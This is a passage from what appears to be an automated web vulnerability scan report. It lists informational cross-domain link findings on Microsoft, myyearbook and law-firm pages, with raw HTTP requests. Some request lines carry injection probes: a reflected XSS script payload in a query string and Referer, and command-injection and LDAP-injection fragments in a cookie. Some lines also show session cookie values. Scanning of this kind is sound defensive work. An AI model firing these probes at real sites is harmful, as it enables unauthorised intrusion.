<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000070" bi:index="3" bi:type="secondarycta" href="http://www.bing.com/music/lyrics"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000071" bi:index="4" bi:type="secondarycta" href="http://www.bing.com/maps/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000072" bi:index="5" bi:type="secondarycta" href="http://www.bing.com/music"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000073" bi:index="6" bi:type="secondarycta" href="http://www.bing.com/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000074" bi:index="7" bi:type="secondarycta" href="http://www.bing.com/shopping"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000075" bi:index="8" bi:type="secondarycta" href="http://www.bing.com/news"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000076" bi:index="9" bi:type="secondarycta" href="http://www.bing.com/videos"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000077" bi:index="10" bi:type="secondarycta" href="http://www.bing.com/weather/search?q=weather"><span class="hpFeat_Text">
...[SNIP]...

18.180. http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/homepage/Components/Grid/Work-Business.asch

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch?uid=ctl00_ctl15_PivotItemsRepeater_ctl00_SubPivotBodyRepeater_ctl00_Body

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/332372542/direct/01/
http://clk.atdmt.com/MRT/go/332385281/direct/01/
http://clk.atdmt.com/MRT/go/332400957/direct/01/
http://clk.atdmt.com/MRT/go/332400957/direct/01/01/
http://clk.atdmt.com/MRT/go/332400960/direct/01/
http://clk.atdmt.com/MRT/go/332544001/direct/01/
http://clk.atdmt.com/MRT/go/334247684/direct/01/
http://crm.dynamics.com/en-us/
http://www.bing.com/
http://www.bing.com/finance/
http://www.bing.com/images/
http://www.bing.com/maps/
http://www.bing.com/music
http://www.bing.com/music/lyrics
http://www.bing.com/news
http://www.bing.com/shopping
http://www.bing.com/travel/
http://www.bing.com/videos
http://www.bing.com/weather/search?q=weather
http://www.microsoftstore.com/store/msstore/cat/categoryID.37946100
http://www.microsoftstore.com/store/msstore/cat/categoryID.50606600
http://www.microsoftstore.com/store/msstore/cat/parentCategoryID.44067000/categoryID.50791300
http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200
http://www.microsoftstore.com/store/msstore/list/parentCategoryID.50606600/categoryID.50789900
http://www.powerpivot.com/

Request

GET /en-us/homepage/Components/Grid/Work-Business.asch?uid=ctl00_ctl15_PivotItemsRepeater_ctl00_SubPivotBodyRepeater_ctl00_Body HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC0=1311278714446; MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311267914536:ss=1311267914528; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3479ae57-7751-4c89-8161-ba065153f2e6&Microsoft.CreationDate=07/21/2011 20:05:08&Microsoft.LastVisitDate=07/21/2011 20:05:08&Microsoft.NumberOfVisits=1&SessionCookie.Id=824E728916A81675B7F5B989F626528E; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/21/2011 20:05:08&Microsoft.VisitStartDate=07/21/2011 20:05:08&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=78&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=45fae15b2a02454c857d5c6314fa56b7
If-None-Match: 634466640790000000
If-Modified-Since: Tue, 19 Jul 2011 16:21:19 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 20:15:26 GMT
Last-Modified: Thu, 21 Jul 2011 17:58:50 GMT
ETag: 634468427300000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438479041800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 20:05:26 GMT
Content-Length: 101817

...<div bi:type="hpGrid" bi:parenttitle="item" class="hpGrd_Grid"> <div id="ctl00_ctl15_PivotItemsRepeater_ctl00_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_Column" class
...[SNIP]...
<div class="hpHro_Item" style="width:530px;" index="0" bi:index="0" bi:type="infotem"> <a href="http://clk.atdmt.com/MRT/go/332400957/direct/01/" bi:linkid="300-00-121LMUS007399" bi:campaignname="(Office Trial Q1FY12)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/Hero/Office2010Try2New_v4_530x320_lt.jpg" alt="Try Microsoft Office Home and Business 2010 for free." width="530" height="320" c
...[SNIP]...
</p> <a class="hpFeat_Link Arrow" bi:linkid="305-00-121LMUS007399" bi:campaignname="(Office Trial Q1FY12)" bi:type="cta" bi:parenttitle="item" href="http://clk.atdmt.com/MRT/go/332400957/direct/01/01/"><span class="hpFeat_Text">
...[SNIP]...
epeater_ctl00_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl00_CellRepeater_ctl01_ctl01_featureItemID_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://clk.atdmt.com/MRT/go/332544001/direct/01/" bi:linkid="310-00-121GMUS007257" bi:campaignname="(Microsoft Security Essentials_2012_Q1)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/SecEss_sm.png" alt="Help protect your PC with Microsoft Security Essentials." width="70" height="70" class="hpImage_I
...[SNIP]...
<li > <a class="hpFeat_Link Arrow" bi:linkid="310-00-121GMUS007257" bi:campaignname="(Microsoft Security Essentials_2012_Q1)" bi:index="0" bi:type="primarycta" href="http://clk.atdmt.com/MRT/go/332544001/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="311-00-121GMUS007346" bi:campaignname="(CARE: Guided Technical Software Evaluation)" bi:index="0" bi:type="secondarycta" href="http://clk.atdmt.com/MRT/go/332372542/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="311-00-121LSUS008758" bi:campaignname="(NEW PowerPivot campaign)" bi:index="1" bi:type="secondarycta" href="http://www.powerpivot.com/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="312-00-121GMUS007312" bi:campaignname="(Office 365 GA)" bi:index="0" bi:type="secondarycta" href="http://clk.atdmt.com/MRT/go/332385281/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="312-00-121LSUS007428" bi:campaignname="(Windows Phone Apps)" bi:index="1" bi:type="secondarycta" href="http://clk.atdmt.com/MRT/go/334247684/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="330-00-121LSUS008470" bi:campaignname="(Microsoft Store for Small Business (GEN for BDM))" bi:index="0" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/cat/categoryID.37946100"><span class="hpFeat_Text">
...[SNIP]...
epeater_ctl00_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl02_CellRepeater_ctl01_ctl01_featureItemID_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://clk.atdmt.com/MRT/go/332400960/direct/01/" bi:linkid="340-00-121LMUS007399" bi:campaignname="(Office Trial Q1FY12)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/Office2010HB_sm.png" alt="Try Microsoft Office Home and Business 2010 for free." width="70" height="70" class="hpImag
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="340-00-121LMUS007399" bi:campaignname="(Office Trial Q1FY12)" bi:index="0" bi:type="secondarycta" href="http://clk.atdmt.com/MRT/go/332400960/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000017" bi:index="3" bi:type="secondarycta" href="http://crm.dynamics.com/en-us/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000028" bi:index="1" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/cat/categoryID.50606600"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000032" bi:index="5" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/cat/parentCategoryID.44067000/categoryID.50791300"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000033" bi:index="6" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000036" bi:index="9" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.50606600/categoryID.50789900"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000047" bi:index="7" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000067" bi:index="0" bi:type="secondarycta" href="http://www.bing.com/travel/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000068" bi:index="1" bi:type="secondarycta" href="http://www.bing.com/finance/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000069" bi:index="2" bi:type="secondarycta" href="http://www.bing.com/images/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000070" bi:index="3" bi:type="secondarycta" href="http://www.bing.com/music/lyrics"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000071" bi:index="4" bi:type="secondarycta" href="http://www.bing.com/maps/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000072" bi:index="5" bi:type="secondarycta" href="http://www.bing.com/music"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000073" bi:index="6" bi:type="secondarycta" href="http://www.bing.com/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000074" bi:index="7" bi:type="secondarycta" href="http://www.bing.com/shopping"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000075" bi:index="8" bi:type="secondarycta" href="http://www.bing.com/news"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000076" bi:index="9" bi:type="secondarycta" href="http://www.bing.com/videos"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000077" bi:index="10" bi:type="secondarycta" href="http://www.bing.com/weather/search?q=weather"><span class="hpFeat_Text">
...[SNIP]...

18.181. http://www.microsoft.com/en-us/security_essentials/Search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/Search.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/en-us/security_essentials/Search.aspx?search=xss

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.5.1.min.js
http://www.gamesforwindows.com/en-US
http://www.microsoftstore.com/
http://www.xbox.com/en-US/

Request

GET /en-us/security_essentials/Search.aspx?search=xss HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: MC0=1311269739221; WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311259013689:ss=1311258939330; WT_NVR=0=/:1=en-us:2=en-us/security_essentials; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/21/2011 17:35:34&Microsoft.VisitStartDate=07/21/2011 17:35:34&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=18&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!; .ASPXANONYMOUS=fMYFXJ59zAEkAAAAMzdkNTY4ODYtYTQxMy00NzkwLTgxZWQtODU5MWI4ZWUzOTA4PXatpD9i2BnSn5tNUQIzlvHrVlU1; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet:1=:2=; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=a249f876-00b8-4c5d-9c21-de037b2ac7b6&Microsoft.CreationDate=07/21/2011 17:35:34&Microsoft.LastVisitDate=07/21/2011 17:35:34&Microsoft.NumberOfVisits=1&SessionCookie.Id=8398488F0DFE43145C0E05E22527CE9C; MS0=218903b4e52846208d2f3155cff8d220

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 17:47:31 GMT
Last-Modified: Mon, 18 Jul 2011 20:49:00 GMT
ETag: 634465937400000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438312543000000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:37:29 GMT
Content-Length: 121259

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en"><head><title>Search</title><meta http-equiv="X-UA-
...[SNIP]...
<body bi:type="oneMscomMaster"> <script src="http://code.jquery.com/jquery-1.5.1.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-US/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-US/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-US/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-US/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-US/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-US/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLink" class="mstHdr_MenuLink"> <a href="http://www.microsoftstore.com/" id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkAnchor" class="mstHdr_MenuLinkAnchor"> <div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkText" class="mstHdr_MenuLinkTxt">
...[SNIP]...

18.182. http://www.microsoft.com/en-us/security_essentials/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.5.1.min.js
http://view.atdmt.com/iaction/mrtpcu_FY11MSSecurityEssentialsLandingPageLP_1
http://www.gamesforwindows.com/en-US
http://www.icsalabs.com/vendor/microsoft-corporation
http://www.microsoftstore.com/
http://www.westcoastlabs.com/checkmark/
http://www.xbox.com/en-US/

Request

GET /en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1 HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311189489524:ss=1311187844264; WT_NVR=0=/:1=en-us:2=en-us/security_essentials; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/20/2011 22:17:59&Microsoft.VisitStartDate=07/20/2011 21:50:50&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=17&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!; .ASPXANONYMOUS=fMYFXJ59zAEkAAAAMzdkNTY4ODYtYTQxMy00NzkwLTgxZWQtODU5MWI4ZWUzOTA4PXatpD9i2BnSn5tNUQIzlvHrVlU1; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 17:45:14 GMT
Last-Modified: Mon, 18 Jul 2011 20:49:00 GMT
ETag: 634465937400000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438255841900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:14 GMT
Content-Length: 127996

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en"><head><title>Virus, Spyware & Malware Protection |
...[SNIP]...
<body bi:type="oneMscomMaster"> <script src="http://code.jquery.com/jquery-1.5.1.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-US/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-US/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-US/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-US/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-US/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-US/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com/"><span>
...[SNIP]...
<div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLink" class="mstHdr_MenuLink"> <a href="http://www.microsoftstore.com/" id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkAnchor" class="mstHdr_MenuLinkAnchor"> <div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkText" class="mstHdr_MenuLinkTxt">
...[SNIP]...
</script><iframe src="http://view.atdmt.com/iaction/mrtpcu_FY11MSSecurityEssentialsLandingPageLP_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<div><a href="http://www.westcoastlabs.com/checkmark/" target="_blank"><img src="/global/en-us/security_essentials/PublishingImages/logo_checkmark.gif" border="0"></a>.... <a href="http://www.icsalabs.com/vendor/microsoft-corporation" target="_blank"><img src="/global/en-us/security_essentials/PublishingImages/logo_icsa.gif" border="0">
...[SNIP]...

18.183. http://www.myyearbook.com/advertising/default.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network

The response contains the following link to another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:39 GMT
Server: Apache
X-Server-Name: web47
Content-Length: 788
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.105

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...

18.184. http://www.nmmlaw.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nmmlaw.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56

The response contains the following links to other domains:

http://meritas.org/
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /index.php?option=com_content&task=view&id=501&Itemid=56 HTTP/1.1
Host: www.nmmlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
